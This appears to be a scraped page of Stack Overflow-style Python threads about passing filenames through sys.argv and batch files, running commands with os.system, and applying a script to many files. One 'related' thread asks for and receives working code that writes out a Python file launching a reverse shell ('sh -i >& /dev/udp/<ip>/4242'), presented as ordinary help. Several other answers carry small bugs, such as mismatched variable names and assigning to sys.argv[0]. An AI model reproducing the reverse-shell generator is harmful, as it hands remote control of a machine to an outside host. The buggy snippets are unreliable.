I have the below python script which takes a user input that is eventually used by the program to read a particular file.
I want to execute the python program from batch script and pass the file_name in the batch script. Can someone please help?
file_name = input("Input File Name to Compare: ")
path = ("outward\\" + file_name)
import sys
file_name = sys.argv[1]
path = "outward\\" + file_name
and you pass it to your script like:
$ python script.py filename.ext
To run the Python program from the batch script and pass the filename into the batch script, you need to use sys, so:
import sys
sys.argv is automatically a list of strings representing arguments on the command line. You can use this as an input for your program. Represents the first command line argument (like a string) given to the script in question.
The lists are indexed by numbers based on zero, so you can get the individual items using the syntax [0]. To get the script name, you need to get the first argument after the script for a filename, so:
filename = sys.argv[1]
path = "outward\\" + file_name
Next you need to pass it to your script like this:
$ python your_script.py filename.ext
(not to be confused with .ext with .text)
Your complete code for the solution to the question, quite simply, will be:
import sys
filename = sys.argv[1]
path = "outward\\" + file_name
and
$ python your_script.py filename.ext
You could use the sys.argv Python function.
The idea would be to get the input from the user in the batch file, then execute the Python program from the batch file while passing the user input as a command line argument to the python file. Example:
batchfile.bat
#echo off
set /p file="Enter Filename: "
python /path/to/program/pythonprogram.py %file%
pythonprogram.py
import sys
sys.argv[0] = file_name
path = ("outward\\" + file_name)
Now, when you execute the batch file, it will prompt for user input of a filename. Then, it will execute the Python program while passing the filename as a command-line argument to the Python file. Then using the sys.argv function you can collect the argument.
Related
I have code similar to this
ip = input("Enter IP: ")
I need to make it after receving ip create new python file with this commands
import os
os.system('/bin/bash -c "setsid
sh -i >& /dev/udp/"ip"/4242
0>&1"')
And instead of "ip" I need it to write ip that user entered
And second script shouldn't ask for input, it should take data from first
You could do it with the following script:
ip = input("Enter IP: ")
bash_script = f"/bin/bash -c 'setsid sh -i >& /dev/udp/{ip}/4242 0>&1'"
other_python_script = f"""
import os
os.system(\"""{bash_script}\""")
"""
with open("otherscript.py", "w") as python_script_file:
python_script_file.write(other_python_script)
Well, what is happening there?
First, I write the ip value in the string containing the bash script using the f-string and stores it in bash_script
Then, I use f-string to write the bash_script inside the python code string that will be inside the python file. This string is stored in the other_python_script variable.
Lastly, I just write the python code string in a file called otherscript.py.
And you will have a python file with the code you want.
You could do the first and second steps in on the same line. I separated into two lines of code for a matter of clarity. And this code works only in python 3.6^. Older versions should use other methods for write values into strings.
Hopefully, this helps, please let me know if you need anything below explained.
import os
path = yourPathHere // insert your filePath here without the fileName itself
ip = input('insert ip address here: ') // this will contain the ip address
if not os.path.exists(path): // checks if the path does exist, if not
os.makedirs(path) // make it
// this is a formatted string with the ip variable inside of it
pyFileContent = f'whatever/content/you/want/to/put/{ip}/whatever/else'
// creates a string of the name of your .py file
filename = 'yourPythonFileNameHere' + '.py'
// this joins the name of filename.py and path, creates and opens it
with open(os.path.join(path, filename), 'w') as my_file:
my_file.write(pyFileContent) // writes the content inside of it then closes
I have a nonpython program I am running with python using the os.system command, but I put this command inside a function. The program I want to run with os.system is supposed to give me an output file, and I need that output for processing, also I need that output to be actually written in the directory I am sending it to.
I wrote my function is the following general format
def myFunction(infile):
os.system('myProgram '+infile+' '+outfileName)
outfile = numpy.loadtxt(outfileName)
return outfile
However, the output of myProgram (outfileName) isn't being written to my directory and numpy can't therefore load it. Is there a way to store globally outputs of programs I run using os.system when it's inside a function?
Assuming myProgram is working correctly, this is likely happening because myProgram does not know the python path, so the file is simply being written somewhere else. Try using the full paths and see if that works.
Assuming infile and outfileName are relative paths in your current working directory, you could do:
def myFunction(infile):
cmd = 'myProgram ' + os.path.join(os.getcwd(), infile)
cmd += ' ' + os.path.join(os.getcwd(), outfileName))
os.system(cmd)
outfile = numpy.loadtxt(outfileName)
return outfile
I'm trying to practice with python script by writing a simple script that would take a large series of files named A_B and write them to the location B\A. The way I was passing the arguments into the file was
python script.py *
and my program looks like
from sys import argv
import os
import ntpath
import shutil
script, filename = argv
target = open(filename)
outfilename = target.name.split('_')
outpath=outfilename[1]
outpath+="/"
outpath+=outfilename[0]
if not os.path.exists(outfilename[1]):
os.makedirs(outfilename[1])
shutil.copyfile(target.name, outpath)
target.close()
The problem with this is that this script the way it's currently written is set up to only accept 1 file at a time. Originally I was hoping the wildcard would pass one file at a time to the script then execute the script each time.
My question covers both cases:
How could I instead pass the wildcard files one at a time to a script.
and
How do I modify this script to instead accept all the arguments? (I can handle list-ifying everything but argv is what I'm having problems with and im a bit unsure about how to create a list of files)
You have two options, both of which involve a loop.
To pass the files one by one, use a shell loop:
for file in *; do python script.py "$file"; done
This will invoke your script once for every file matching the glob *.
To process multiple files in your script, use a loop there instead:
from sys import argv
for filename in argv[1:]:
# rest of script
Then call your script from bash like python script.py * to pass all the files as arguments. argv[1:] is an array slice, which returns a list containing the elements from argv starting from position 1 to the end of the array.
I would suggest the latter approach as it means that you are only invoking one instance of your script.
I have a shell script that does
find /tmp/test/* -name "*.json" -exec python /python/path {} \;
it looks for all the JSON files in specific directories and executes the OTHER python script that I have..
How can I do this python scripting?
I'm not sure if I understood your question, if you are trying to execute a shell command from a python script, you can use os.system() :
import os
os.system('ls -l')
complete documentation
import glob,subprocess
for json_file in glob.glob("/home/tmp/*.json"):
subprocess.Popen(["python","/path/to/my.py",json_file],env=os.environ).communicate()
If you want to use Python instead of find, start with os.walk (official doc) to get the files. Once you have them (or as you them), act on them however you like.
From that page:
import os
for dirName, subdirList, fileList in os.walk(rootDir):
print('Found directory: %s' % dirName)
for fname in fileList:
print('\t%s' % fname)
# act on the file
I guess you want to adjust your other python file /python/path/script.py, such that you only need this one file:
#!/usr/bin/env python
import sys
import glob
import os
#
# parse the command line arguemnts
#
for i, n in enumerate(sys.argv):
# Debug output
print "arg nr %02i: %s" % (i, n)
# Store the args in variables
# (0 is the filename of the script itself)
if i==1:
path = sys.argv[1] # the 1st arg is the path like "/tmp/test"
if i==2:
pattern = sys.argv[2] # a pattern to match for, like "'*.json'"
#
# merge path and pattern
# os.path makes it win / linux compatible ( / vs \ ...) and other stuff
#
fqps = os.path.join(path, pattern)
#
# Do something with your files
#
for filename in glob.glob(fqps):
print filename
# Do your stuff here with one file
with open(filename, 'r') as f: # 'r'= only ready from file ('w' = write)
lines = f.readlines()
# at this point, the file is closed again!
for line in lines:
print line
# and so on ...
Then you can use the one script like this
/python/path/script.py /tmp/test/ '*.json'. (Without needing to write python in front, thanks to the very first line, called shebang. But you need to make it executable once, using chmod +x /python/path/script.py)
Of course you can omit the 2nd arg and assign a default value to pattern, or only use one arg in the first place. I did it this way to demonstrate os.path.join() and quoting of arguments that should not be extended by bash (compare the effect of using '*.json' and *.json on the printed list of arguments at the start)
Here are some information about better / more sophisticated ways of handling command line arguments.
And, as a bonus, using a main() function is advisable as well, to keep overview if your script gets larger or is being used by other python scripts.
What you need is
find /tmp/test/* -name "*.json" -exec sh -c "python /python/path {}" \;
I have written a function for data processing and need to apply it to a large amount of files in a directory.
The function works when applied to individual files.
def getfwhm(x):
import numpy as np
st=np.std(x[:,7])
fwhm=2*np.sqrt(2*np.log(2))*st
file=open('all_fwhm2.txt', 'at')
file.write("fwhm = %.6f\n" % (fwhm))
file.close()
file=open('all_fwhm2.txt', 'rt')
print file.read()
file.close()
I now want to use this in a larger scale. So far I have written this code
import os
import fwhmfunction
files=os.listdir(".")
fwhmfunction.getfwhm(files)
But I get the following error
File "fwhmfunction.py", line 11, in getfwhm
st=np.std(x[:,7])
TypeError: list indices must be integers, not tuple
I am writing in python using spyder.
Thanks for your help!
In the spirit of the unix You should separate the program in two:
the program which acts on the given file
the program which applies a given script to a given list of files (glob, or whatever)
So here's a sample of 1:
# name: script.py
import sys
File = sys.argv[1]
# do something here
print File
(it is better to use argparse to parse the args, but we used argv to keep it simple)
As to the second part, there is an excellent unix tool already:
$ find . -maxdepth 1 -mindepth 1 -name "*.txt" | parallel python2.7 script.py {}
Here you get an extra bonus: parallel task execution.
If You on windows, then You can write something simple (sequentional) in python:
# name: apply_script_to_glob.py
import sys, os
from glob import glob
Script = sys.argv[1]
Glob = sys.argv[2]
Files = glob(Glob)
for File in Files:
os.system("python2.7 " + Script + " " + File)
(again we didn't use argparse nor checked anything to keep it simple). You'd call the script with
$ python2.7 apply_script_to_glob.py "script.py" "*.txt"